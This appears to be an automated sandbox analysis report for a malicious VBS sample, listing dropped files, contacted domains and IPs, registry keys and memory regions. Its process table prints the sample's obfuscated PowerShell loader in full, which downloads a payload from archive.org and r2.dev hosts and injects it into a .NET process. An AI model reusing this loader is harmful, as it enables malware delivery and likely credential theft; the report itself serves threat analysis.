Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
89SkYNNpdi.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0lqryue3.j5p.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ewc4gs0.nq4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5crdsbbm.lvl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zcyy4yc3.52n.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\freebl3.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\mozglue.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\msvcp140.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\nss3.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\softokn3.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\vcruntime140.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\.zyDKbw.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie
0xe, schema 4, UTF-8, version-valid-for 1
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\BmIvB.G.tmp
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\nEofbjk.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie
0xb, schema 4, UTF-8, version-valid-for 1
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\rfwzH.o.tmp
|
JSON data
|
dropped
|
There are 6 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\89SkYNNpdi.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAyYTAnKyc3NWIxYmMnKycwJysnZDQnKyc1YicrJzYzMicrJ2ViOScrJ2UnKydlNjInKyctYnUnKydwLycrJy86c3B0JysndGhZU0QgLCcrJyBZU0QnKydkZXNhdCcrJ2knKyd2JysnYWQnKydvWVMnKydEICwnKycgJysnWVNEJysnZCcrJ2VzYScrJ3RpJysndmFkbycrJ1knKydTRCcrJyAsICcrJ1lTRGRlc2F0aXZhZG9ZJysnUycrJ0QnKycsWScrJ1NEQWRkJysnSW5QJysncm8nKydjZXNzMycrJzJZU0QsWVNEWVNEJysnKSknKS5yRVBMYUNFKCdkazcnLFtzdFJpTmddW0NoYVJdMzYpLnJFUExhQ0UoJ1lTRCcsW3N0UmlOZ11bQ2hhUl0zOSkgKQ==';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
".((Gv '*MDr*').naME[3,11,2]-Join'') (('dk'+'7u'+'rl '+'= YSDhttps://ia600100.us'+'.a'+'rchive.org/2'+'4'+'/'+'items/det'+'ah-'+'note-v/'+'Detah'+'N'+'oteV.t'+'xt'+'YSD'+';dk7'+'b'+'ase'+'64Co'+'nten'+'t'+'
= '+'(Ne'+'w-O'+'bje'+'ct '+'S'+'ys'+'te'+'m.Ne'+'t.WebC'+'lie'+'nt).Downlo'+'a'+'dS'+'trin'+'g(d'+'k7u'+'rl'+');d'+'k'+'7bi'+'n'+'aryCo'+'n'+'ten'+'t
= '+'[Syste'+'m.Convert'+']:'+':'+'Fr'+'omBase64S'+'tri'+'ng(d'+'k'+'7bas'+'e6'+'4Conten'+'t);dk7'+'ass'+'em'+'bl'+'y ='+'
['+'R'+'eflect'+'ion.As'+'s'+'embly]:'+':L'+'oa'+'d(dk7bin'+'ary'+'Co'+'ntent);'+'dk7ty'+'p'+'e = '+'dk'+'7'+'as'+'se'+'mbly.Ge'+'tType('+'Y'+'SDRu'+'nP'+'E'+'.Hom'+'eY'+'SD'+');dk7method
='+' dk7'+'type.'+'G'+'e'+'tMeth'+'od(YSDVAIYSD)'+';dk7met'+'h'+'o'+'d.I'+'nvoke('+'dk7n'+'ull,'+' [obj'+'ect[]]'+'@('+'YSD'+'txt.'+'ey'+'no/v'+'ed.2r.39b34'+'5302a0'+'75b1bc'+'0'+'d4'+'5b'+'632'+'eb9'+'e'+'e62'+'-bu'+'p/'+'/:spt'+'thYSD
,'+' YSD'+'desat'+'i'+'v'+'ad'+'oYS'+'D ,'+' '+'YSD'+'d'+'esa'+'ti'+'vado'+'Y'+'SD'+' , '+'YSDdesativadoY'+'S'+'D'+',Y'+'SDAdd'+'InP'+'ro'+'cess3'+'2YSD,YSDYSD'+'))').rEPLaCE('dk7',[stRiNg][ChaR]36).rEPLaCE('YSD',[stRiNg][ChaR]39)
)"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev/onye.txt
|
162.159.140.237
|
|
|
|
https://ia600100.us
|
unknown
|
|
|
|
https://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
|
unknown
|
|
|
|
http://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
|
unknown
|
|
|
|
109.248.151.156
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://www.mozilla.com/en-US/blocklist/
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://ocsp.thawte.com0
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.mozilla.com0
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://ia600100.us.arX
|
unknown
|
||
|
http://crl.rootca1.amazontrust.com/rootca1.crl0
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
http://ocsp.rootca1.amazontrust.com0:
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtYSD;dk7base64Content
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtYSD;$base64Content
|
unknown
|
||
|
https://github.com/syohex/java-simple-mine-sweeper
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
|
207.241.227.240
|
||
|
http://crl.thawte.com/ThawteTimestampingCA.crl0
|
unknown
|
||
|
http://x1.c.lencr.org/0
|
unknown
|
||
|
http://x1.i.lencr.org/0
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://crt.rootca1.amazontrust.com/rootca1.cer0?
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://ia600100.us.archive.org
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://github.com/syohex/java-simple-mine-sweeperC:
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://ia600100.us.archive.org
|
unknown
|
There are 27 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
|
162.159.140.237
|
|
|
|
ia600100.us.archive.org
|
207.241.227.240
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
162.159.140.237
|
pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
|
United States
|
|
|
|
109.248.151.156
|
unknown
|
Russian Federation
|
|
|
|
207.241.227.240
|
ia600100.us.archive.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
|
MaxConnectionsPer1_0Server
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
|
MaxConnectionsPerServer
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum
|
Version
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1B2A315C000
|
trusted library allocation
|
page read and write
|
|
|
|
1B2BB240000
|
trusted library section
|
page read and write
|
|
|
|
1B2B2DE3000
|
trusted library allocation
|
page read and write
|
|
|
|
4D7D000
|
heap
|
page read and write
|
|
|
|
1B2B3123000
|
trusted library allocation
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
28A8335C000
|
heap
|
page read and write
|
||
|
7028D000
|
unkown
|
page readonly
|
||
|
18D72201000
|
heap
|
page read and write
|
||
|
7FF7BFF71000
|
trusted library allocation
|
page read and write
|
||
|
18D72140000
|
heap
|
page read and write
|
||
|
7FF7BFF42000
|
trusted library allocation
|
page read and write
|
||
|
3C6F000
|
stack
|
page read and write
|
||
|
1B2A2F30000
|
trusted library allocation
|
page read and write
|
||
|
F941F8000
|
stack
|
page read and write
|
||
|
70332000
|
unkown
|
page read and write
|
||
|
6CC8C0D000
|
stack
|
page read and write
|
||
|
1B2A2B21000
|
trusted library allocation
|
page read and write
|
||
|
5233000
|
direct allocation
|
page read and write
|
||
|
7FF7BFE70000
|
trusted library allocation
|
page read and write
|
||
|
28A814F5000
|
heap
|
page read and write
|
||
|
6CC77FD000
|
stack
|
page read and write
|
||
|
C34E2FF000
|
stack
|
page read and write
|
||
|
7FF7C00A0000
|
trusted library allocation
|
page read and write
|
||
|
28A835B4000
|
heap
|
page read and write
|
||
|
1B2A0BF8000
|
heap
|
page read and write
|
||
|
73BE1000
|
unkown
|
page readonly
|
||
|
18D5A0E6000
|
trusted library allocation
|
page read and write
|
||
|
5277000
|
direct allocation
|
page read and write
|
||
|
1B2BAEC0000
|
heap
|
page read and write
|
||
|
28A8348A000
|
heap
|
page read and write
|
||
|
28A82EC7000
|
heap
|
page read and write
|
||
|
28A82F0F000
|
heap
|
page read and write
|
||
|
18D5A0E0000
|
trusted library allocation
|
page read and write
|
||
|
28A816E0000
|
heap
|
page read and write
|
||
|
28A8336C000
|
heap
|
page read and write
|
||
|
F939EE000
|
stack
|
page read and write
|
||
|
5219000
|
direct allocation
|
page read and write
|
||
|
7FF7C0030000
|
trusted library allocation
|
page read and write
|
||
|
18D58360000
|
heap
|
page readonly
|
||
|
18D58330000
|
trusted library allocation
|
page read and write
|
||
|
3CAE000
|
stack
|
page read and write
|
||
|
1576000
|
heap
|
page read and write
|
||
|
7FF7BFFC0000
|
trusted library allocation
|
page read and write
|
||
|
18D58370000
|
trusted library allocation
|
page read and write
|
||
|
28A83348000
|
heap
|
page read and write
|
||
|
7FF7BFDC2000
|
trusted library allocation
|
page read and write
|
||
|
1B2A0E50000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0160000
|
trusted library allocation
|
page read and write
|
||
|
70210000
|
unkown
|
page readonly
|
||
|
18D6A038000
|
trusted library allocation
|
page read and write
|
||
|
F93CFE000
|
stack
|
page read and write
|
||
|
28A83300000
|
heap
|
page read and write
|
||
|
7FF7BFF7A000
|
trusted library allocation
|
page read and write
|
||
|
702D1000
|
unkown
|
page execute read
|
||
|
7FF7BFDD0000
|
trusted library allocation
|
page read and write
|
||
|
28A835BC000
|
heap
|
page read and write
|
||
|
18D59FC1000
|
trusted library allocation
|
page read and write
|
||
|
18D5A059000
|
trusted library allocation
|
page read and write
|
||
|
28A813D0000
|
heap
|
page read and write
|
||
|
F93DFF000
|
stack
|
page read and write
|
||
|
28A82EF8000
|
heap
|
page read and write
|
||
|
7FF7BFF5A000
|
trusted library allocation
|
page read and write
|
||
|
28A82E91000
|
heap
|
page read and write
|
||
|
1B2BACD5000
|
heap
|
page read and write
|
||
|
F9447C000
|
stack
|
page read and write
|
||
|
18D72250000
|
heap
|
page execute and read and write
|
||
|
7FF7BFE5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
5214000
|
direct allocation
|
page read and write
|
||
|
5499000
|
direct allocation
|
page read and write
|
||
|
28A82F00000
|
heap
|
page read and write
|
||
|
1B2A26D6000
|
heap
|
page read and write
|
||
|
18D69FD0000
|
trusted library allocation
|
page read and write
|
||
|
14B8000
|
heap
|
page read and write
|
||
|
6CC80BE000
|
stack
|
page read and write
|
||
|
520C000
|
direct allocation
|
page read and write
|
||
|
7FF7BFEC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7BFDA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
5300000
|
direct allocation
|
page read and write
|
||
|
7FF7BFDCD000
|
trusted library allocation
|
page execute and read and write
|
||
|
18D58440000
|
heap
|
page read and write
|
||
|
70338000
|
unkown
|
page readonly
|
||
|
7FF7C00A0000
|
trusted library allocation
|
page read and write
|
||
|
F93F7E000
|
stack
|
page read and write
|
||
|
1B2A0E30000
|
trusted library allocation
|
page read and write
|
||
|
28A82ED3000
|
heap
|
page read and write
|
||
|
1B2A46FC000
|
trusted library allocation
|
page read and write
|
||
|
18D5A5D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7BFDA4000
|
trusted library allocation
|
page read and write
|
||
|
1B2A47C6000
|
trusted library allocation
|
page read and write
|
||
|
70335000
|
unkown
|
page readonly
|
||
|
7FF7BFE56000
|
trusted library allocation
|
page read and write
|
||
|
18D7220F000
|
heap
|
page read and write
|
||
|
C34E3FB000
|
stack
|
page read and write
|
||
|
1B2A3135000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0163000
|
trusted library allocation
|
page read and write
|
||
|
70271000
|
unkown
|
page execute read
|
||
|
3063000
|
heap
|
page read and write
|
||
|
1B2A319C000
|
trusted library allocation
|
page read and write
|
||
|
7FF7BFF60000
|
trusted library allocation
|
page read and write
|
||
|
1B2A4249000
|
trusted library allocation
|
page read and write
|
||
|
28A83597000
|
heap
|
page read and write
|
||
|
28A82EB7000
|
heap
|
page read and write
|
||
|
28A83328000
|
heap
|
page read and write
|
||
|
13C0000
|
heap
|
page read and write
|
||
|
28A82EA2000
|
heap
|
page read and write
|
||
|
3130000
|
heap
|
page read and write
|
||
|
28A8334D000
|
heap
|
page read and write
|
||
|
28A816E5000
|
heap
|
page read and write
|
||
|
1B2B2B31000
|
trusted library allocation
|
page read and write
|
||
|
1B2A0E60000
|
heap
|
page readonly
|
||
|
7FF7C00C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7BFE60000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7BFDC4000
|
trusted library allocation
|
page read and write
|
||
|
1B2A0C36000
|
heap
|
page read and write
|
||
|
28A835B9000
|
heap
|
page read and write
|
||
|
1B2BADE0000
|
heap
|
page read and write
|
||
|
18D5A0E3000
|
trusted library allocation
|
page read and write
|
||
|
3DAF000
|
stack
|
page read and write
|
||
|
1B2A4290000
|
trusted library allocation
|
page read and write
|
||
|
3B6E000
|
stack
|
page read and write
|
||
|
28A83389000
|
heap
|
page read and write
|
||
|
28A835AC000
|
heap
|
page read and write
|
||
|
702A1000
|
unkown
|
page execute read
|
||
|
1B2A4269000
|
trusted library allocation
|
page read and write
|
||
|
1B2A0BF2000
|
heap
|
page read and write
|
||
|
7FF7C0000000
|
trusted library allocation
|
page read and write
|
||
|
28A8348E000
|
heap
|
page read and write
|
||
|
18D5823E000
|
heap
|
page read and write
|
||
|
6CC813E000
|
stack
|
page read and write
|
||
|
28A82ED8000
|
heap
|
page read and write
|
||
|
18D5A0D5000
|
trusted library allocation
|
page read and write
|
||
|
28A812F0000
|
heap
|
page read and write
|
||
|
1B2A3B9C000
|
trusted library allocation
|
page read and write
|
||
|
3DEE000
|
stack
|
page read and write
|
||
|
125B000
|
stack
|
page read and write
|
||
|
7FF7BFFA0000
|
trusted library allocation
|
page read and write
|
||
|
18D721FA000
|
heap
|
page read and write
|
||
|
7FF7BFDA2000
|
trusted library allocation
|
page read and write
|
||
|
1B2B3B23000
|
trusted library allocation
|
page read and write
|
||
|
7FF7BFFB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3070000
|
heap
|
page read and write
|
||
|
C34E0FD000
|
stack
|
page read and write
|
||
|
5263000
|
direct allocation
|
page read and write
|
||
|
7FF7C0020000
|
trusted library allocation
|
page read and write
|
||
|
1B2A4421000
|
trusted library allocation
|
page read and write
|
||
|
3F1F000
|
heap
|
page read and write
|
||
|
28A83338000
|
heap
|
page read and write
|
||
|
73BE0000
|
unkown
|
page read and write
|
||
|
28A83500000
|
heap
|
page read and write
|
||
|
527C000
|
direct allocation
|
page read and write
|
||
|
1B2A0E80000
|
heap
|
page read and write
|
||
|
28A83321000
|
heap
|
page read and write
|
||
|
7FF7BFE7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
28A83584000
|
heap
|
page read and write
|
||
|
28A82EB2000
|
heap
|
page read and write
|
||
|
C34DBFE000
|
stack
|
page read and write
|
||
|
28A835BA000
|
heap
|
page read and write
|
||
|
18D72290000
|
heap
|
page execute and read and write
|
||
|
1B2A2B10000
|
heap
|
page execute and read and write
|
||
|
3030000
|
heap
|
page read and write
|
||
|
7FF7BFF90000
|
trusted library allocation
|
page execute and read and write
|
||
|
18D583A0000
|
heap
|
page execute and read and write
|
||
|
7FF7BFF70000
|
trusted library allocation
|
page execute and read and write
|
||
|
70264000
|
unkown
|
page readonly
|
||
|
7FF7C0090000
|
trusted library allocation
|
page read and write
|
||
|
18D58174000
|
heap
|
page read and write
|
||
|
F940F6000
|
stack
|
page read and write
|
||
|
7FF7BFFF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0040000
|
trusted library allocation
|
page read and write
|
||
|
6CC7E38000
|
stack
|
page read and write
|
||
|
28A81500000
|
heap
|
page read and write
|
||
|
28A83319000
|
heap
|
page read and write
|
||
|
18D580C0000
|
heap
|
page read and write
|
||
|
1B2BAC30000
|
heap
|
page read and write
|
||
|
1B2BAF00000
|
heap
|
page read and write
|
||
|
4810000
|
heap
|
page read and write
|
||
|
F93D7E000
|
stack
|
page read and write
|
||
|
28A82EF3000
|
heap
|
page read and write
|
||
|
18D58222000
|
heap
|
page read and write
|
||
|
18D5A4C0000
|
trusted library allocation
|
page read and write
|
||
|
18D58350000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C00B0000
|
trusted library allocation
|
page read and write
|
||
|
28A813F0000
|
heap
|
page read and write
|
||
|
28A83489000
|
heap
|
page read and write
|
||
|
1B2A2630000
|
trusted library allocation
|
page read and write
|
||
|
18D581CA000
|
heap
|
page read and write
|
||
|
18D5A2DE000
|
trusted library allocation
|
page read and write
|
||
|
1B2BAB22000
|
heap
|
page read and write
|
||
|
73BD1000
|
unkown
|
page execute read
|
||
|
28A82F0F000
|
heap
|
page read and write
|
||
|
1B2A0E70000
|
heap
|
page read and write
|
||
|
6CC7D78000
|
stack
|
page read and write
|
||
|
28A82EDC000
|
heap
|
page read and write
|
||
|
4502000
|
heap
|
page read and write
|
||
|
28A835A7000
|
heap
|
page read and write
|
||
|
28A83361000
|
heap
|
page read and write
|
||
|
28A8348B000
|
heap
|
page read and write
|
||
|
6CC7CFE000
|
stack
|
page read and write
|
||
|
7FF7BFF40000
|
trusted library allocation
|
page read and write
|
||
|
18D7218B000
|
heap
|
page read and write
|
||
|
6CC7C7E000
|
stack
|
page read and write
|
||
|
28A835CF000
|
heap
|
page read and write
|
||
|
18D5A0CF000
|
trusted library allocation
|
page read and write
|
||
|
6CC7772000
|
stack
|
page read and write
|
||
|
28A82EE8000
|
heap
|
page read and write
|
||
|
5491000
|
direct allocation
|
page read and write
|
||
|
1B2A0D90000
|
heap
|
page read and write
|
||
|
1B2A43F6000
|
trusted library allocation
|
page read and write
|
||
|
1B2A0CB0000
|
heap
|
page read and write
|
||
|
1B2A0C0E000
|
heap
|
page read and write
|
||
|
C34E1FE000
|
stack
|
page read and write
|
||
|
7FF7C0158000
|
trusted library allocation
|
page read and write
|
||
|
28A835CF000
|
heap
|
page read and write
|
||
|
28A82E9B000
|
heap
|
page read and write
|
||
|
4920000
|
heap
|
page read and write
|
||
|
7025F000
|
unkown
|
page read and write
|
||
|
28A83580000
|
heap
|
page read and write
|
||
|
1B2B2B21000
|
trusted library allocation
|
page read and write
|
||
|
28A82EC2000
|
heap
|
page read and write
|
||
|
73BD0000
|
unkown
|
page readonly
|
||
|
5200000
|
direct allocation
|
page read and write
|
||
|
28A83601000
|
heap
|
page read and write
|
||
|
1B2BADE3000
|
heap
|
page read and write
|
||
|
7FF7C0050000
|
trusted library allocation
|
page read and write
|
||
|
702A0000
|
unkown
|
page readonly
|
||
|
18D7216D000
|
heap
|
page read and write
|
||
|
1B2A2F57000
|
trusted library allocation
|
page read and write
|
||
|
F943FE000
|
stack
|
page read and write
|
||
|
28A83490000
|
heap
|
page read and write
|
||
|
28A8337A000
|
heap
|
page read and write
|
||
|
28A83301000
|
heap
|
page read and write
|
||
|
F93C73000
|
stack
|
page read and write
|
||
|
527F000
|
direct allocation
|
page read and write
|
||
|
18D5A5DA000
|
trusted library allocation
|
page read and write
|
||
|
1B2A425B000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0020000
|
trusted library allocation
|
page read and write
|
||
|
28A82F0F000
|
heap
|
page read and write
|
||
|
7FF7C0120000
|
trusted library allocation
|
page read and write
|
||
|
1B2A26D0000
|
heap
|
page read and write
|
||
|
7FF7C0130000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0070000
|
trusted library allocation
|
page read and write
|
||
|
7FF7BFDC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
702C0000
|
unkown
|
page read and write
|
||
|
53A1000
|
direct allocation
|
page read and write
|
||
|
28A82EFB000
|
heap
|
page read and write
|
||
|
28A83389000
|
heap
|
page read and write
|
||
|
1B2B2E14000
|
trusted library allocation
|
page read and write
|
||
|
28A8331C000
|
heap
|
page read and write
|
||
|
18D5A494000
|
trusted library allocation
|
page read and write
|
||
|
28A83389000
|
heap
|
page read and write
|
||
|
1B2A2F28000
|
trusted library allocation
|
page read and write
|
||
|
6CC81BB000
|
stack
|
page read and write
|
||
|
28A83584000
|
heap
|
page read and write
|
||
|
5279000
|
direct allocation
|
page read and write
|
||
|
3EEF000
|
stack
|
page read and write
|
||
|
28A82EE3000
|
heap
|
page read and write
|
||
|
28A814C0000
|
heap
|
page read and write
|
||
|
28A8330C000
|
heap
|
page read and write
|
||
|
7FF7BFEA6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7BFFE0000
|
trusted library allocation
|
page read and write
|
||
|
4820000
|
heap
|
page read and write
|
||
|
1B2A2F20000
|
trusted library allocation
|
page read and write
|
||
|
28A814E9000
|
heap
|
page read and write
|
||
|
1B2B2E22000
|
trusted library allocation
|
page read and write
|
||
|
28A835CF000
|
heap
|
page read and write
|
||
|
28A82E93000
|
heap
|
page read and write
|
||
|
14F7000
|
heap
|
page read and write
|
||
|
7FF7C0080000
|
trusted library allocation
|
page read and write
|
||
|
7FF7BFF82000
|
trusted library allocation
|
page read and write
|
||
|
4FD2000
|
heap
|
page read and write
|
||
|
7FF7BFFB0000
|
trusted library allocation
|
page read and write
|
||
|
28A8349B000
|
heap
|
page read and write
|
||
|
18D5822B000
|
heap
|
page read and write
|
||
|
28A8159A000
|
heap
|
page read and write
|
||
|
28A835A6000
|
heap
|
page read and write
|
||
|
F94079000
|
stack
|
page read and write
|
||
|
6CD86000
|
unkown
|
page read and write
|
||
|
18D5A11D000
|
trusted library allocation
|
page read and write
|
||
|
7FF7BFF80000
|
trusted library allocation
|
page execute and read and write
|
||
|
28A83494000
|
heap
|
page read and write
|
||
|
18D58237000
|
heap
|
page read and write
|
||
|
28A83375000
|
heap
|
page read and write
|
||
|
1B2BAD50000
|
heap
|
page execute and read and write
|
||
|
28A83493000
|
heap
|
page read and write
|
||
|
18D59FB0000
|
heap
|
page read and write
|
||
|
1B2A0BB8000
|
heap
|
page read and write
|
||
|
7FF7C0154000
|
trusted library allocation
|
page read and write
|
||
|
F93E7D000
|
stack
|
page read and write
|
||
|
28A83389000
|
heap
|
page read and write
|
||
|
1B2A447C000
|
trusted library allocation
|
page read and write
|
||
|
702C2000
|
unkown
|
page readonly
|
||
|
5253000
|
direct allocation
|
page read and write
|
||
|
18D5A500000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0000000
|
trusted library allocation
|
page read and write
|
||
|
28A82F03000
|
heap
|
page read and write
|
||
|
F93FFE000
|
stack
|
